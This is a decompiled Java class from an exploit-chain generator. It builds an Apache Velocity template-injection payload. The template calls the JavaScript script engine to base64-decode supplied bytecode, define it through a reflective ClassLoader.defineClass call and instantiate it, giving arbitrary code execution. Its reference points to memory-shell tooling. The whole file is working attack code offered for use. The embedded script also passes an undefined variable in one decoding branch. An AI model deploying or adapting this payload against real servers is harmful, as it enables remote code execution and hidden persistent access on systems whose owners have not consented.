package com.ar3h.chains.gadget.impl.common.expression;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import org.apache.commons.codec.binary.Base64;

@GadgetAnnotation(name = "velocity表达式js加载字节码", description = "velocity 调用 js 实现执行字节码\nReference: https://github.com/ReaJason/MemShellParty", dependencies = {"velocity", "js"}, authors = {Authors.ReaJason})
@GadgetTags(tags = {Tag.Thymeleaf_Expr, Tag.Expression}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/expression/VelocityConvert2.class */
public class VelocityConvert2 implements Gadget {
    public static String velocityTemplate2 = "#set($x='') #set($cz = $x.class.forName('javax.script.ScriptEngineManager')) $cz.getDeclaredConstructor(null).newInstance().getEngineByName('js').eval('var classLoader = java.lang.Thread.currentThread().getContextClassLoader();var className = \"%s\";var base64Str = \"%s\";try { classLoader.loadClass(className).newInstance();} catch (e) { var clsString = classLoader.loadClass(\"java.lang.String\"); var bytecode; try { var clsBase64 = classLoader.loadClass(\"java.util.Base64\"); var clsDecoder = classLoader.loadClass(\"java.util.Base64$Decoder\"); var decoder = clsBase64.getMethod(\"getDecoder\").invoke(base64Clz); bytecode = clsDecoder.getMethod(\"decode\", clsString).invoke(decoder, base64Str); } catch (ee) { try { var datatypeConverterClz = classLoader.loadClass(\"javax.xml.bind.DatatypeConverter\"); bytecode = datatypeConverterClz.getMethod(\"parseBase64Binary\", clsString).invoke(datatypeConverterClz, base64Str); } catch (eee) { var clazz1 = classLoader.loadClass(\"sun.misc.BASE64Decoder\"); bytecode = clazz1.newInstance().decodeBuffer(base64Str); } } var clsClassLoader = classLoader.loadClass(\"java.lang.ClassLoader\"); var clsByteArray = (new java.lang.String(\"a\").getBytes().getClass()); var clsInt = java.lang.Integer.TYPE; var defineClass = clsClassLoader.getDeclaredMethod(\"defineClass\", [clsByteArray, clsInt, clsInt]); defineClass.setAccessible(true); var clazz = defineClass.invoke(classLoader, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length)); clazz.newInstance();}')";

    private String getObject(byte[] bArr, String str) {
        return String.format(velocityTemplate2, str, Base64.encodeBase64String(bArr));
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Object doCreate = gadgetChain.doCreate(gadgetContext);
        return getObject((byte[]) doCreate, gadgetContext.getString(ContextTag.CLASS_NAME_KEY));
    }
}
